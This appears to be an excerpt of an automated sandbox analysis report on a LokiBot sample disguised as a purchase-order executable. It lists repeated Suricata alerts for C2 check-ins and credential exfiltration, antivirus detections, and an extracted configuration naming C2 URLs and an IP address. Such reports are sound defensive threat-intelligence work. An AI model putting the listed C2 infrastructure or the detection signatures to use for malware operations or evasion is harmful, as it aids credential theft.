Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE LokiBot Checkin - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:42.563782+0200
SID:	2025381
Severity:	1
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:40.138811+0200
SID:	2021641
Severity:	1
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE LokiBot Checkin - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:40.138811+0200
SID:	2025381
Severity:	1
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:21.768470+0200
SID:	2021641
Severity:	1
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE LokiBot Checkin - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:21.768470+0200
SID:	2025381
Severity:	1
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:42.267991+0200
SID:	2021641
Severity:	1
Source Port:	49765
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE LokiBot Checkin - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:42.267991+0200
SID:	2025381
Severity:	1
Source Port:	49765
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:59.722184+0200
SID:	2024313
Severity:	1
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:59.722184+0200
SID:	2024318
Severity:	1
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:44.843250+0200
SID:	2024313
Severity:	1
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:44.843250+0200
SID:	2024318
Severity:	1
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:49.848265+0200
SID:	2024313
Severity:	1
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:49.848265+0200
SID:	2024318
Severity:	1
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:45.003825+0200
SID:	2021641
Severity:	1
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE LokiBot Checkin - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:03:45.003825+0200
SID:	2025381
Severity:	1
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:15.293513+0200
SID:	2021641
Severity:	1
Source Port:	49754
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE LokiBot Checkin - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:15.293513+0200
SID:	2025381
Severity:	1
Source Port:	49754
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:09.482496+0200
SID:	2024313
Severity:	1
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.8 - Destination IP: 104.248.205.66

Timestamp:	2024-08-29T12:04:09.482496+0200
SID:	2024318
Severity:	1
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://kbfvzoboss.bid/alien/fre.php	URL Reputation: Label: malware
Source: http://alphastand.win/alien/fre.php	URL Reputation: Label: malware
Source: http://alphastand.trade/alien/fre.php	URL Reputation: Label: malware
Source: http://alphastand.top/alien/fre.php	URL Reputation: Label: malware
Source: http://104.248.205.66/index.php/17008709	Avira URL Cloud: Label: phishing

Found malware configuration

Source: 00000000.00000002.1745375841.0000000003E30000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://104.248.205.66/index.php/17008709"]}

Multi AV Scanner detection for domain / URL

Source: http://104.248.205.66/index.php/17008709

Virustotal: Detection: 19%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Virustotal: Detection: 58%			Perma Link

Multi AV Scanner detection for submitted file

Source: PO-0Y9005373R664.exe	ReversingLabs: Detection: 52%
Source: PO-0Y9005373R664.exe	Virustotal: Detection: 58%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: PO-0Y9005373R664.exe

Joe Sandbox ML: detected

Source: PO-0Y9005373R664.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: PO-0Y9005373R664.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: QUbn.pdb source: PO-0Y9005373R664.exe, VvtddClQv.exe.0.dr
Source:	Binary string: QUbn.pdbH source: PO-0Y9005373R664.exe, VvtddClQv.exe.0.dr

Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	File opened: C:\Users\user\AppData\Local\Temp\acrocef_low\NULL	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\NULL	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\NULL	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49723 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49723 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49714 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49714 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49748 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49748 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49766 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49766 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.8:49714 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49716 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49716 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49742 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49742 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49723 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49727 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49731 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49727 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49731 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49730 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49730 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49731 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49731 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49723 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49766 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49766 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49748 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49748 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49741 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49756 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49756 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49749 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49749 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49753 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49753 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49730 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49730 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49753 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49753 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49749 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49749 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49751 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49751 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49726 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49726 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49751 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49751 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49732 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49726 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49742 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49734 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49734 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49742 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49732 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49734 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49734 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49757 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49757 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49746 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49746 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49767 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49767 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49737 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49737 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49716 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49716 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49761 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49761 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49737 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49737 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49767 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49767 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49733 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49733 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49746 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49746 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49765 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49765 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49733 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49733 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49735 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49761 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49759 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49756 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49757 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49757 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49761 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49756 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49735 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49732 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49732 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49759 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49735 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49735 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49728 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49728 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49750 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49741 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49729 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49729 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49728 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49728 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49765 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49765 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49741 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49741 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49729 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49729 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49726 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49752 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49727 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49727 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49759 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49740 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49752 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49755 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49743 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49743 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49740 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49743 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49755 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49743 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49752 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49752 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49738 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49738 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49764 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49764 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49750 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49745 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49745 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49759 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49738 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49738 -> 104.248.205.66:80
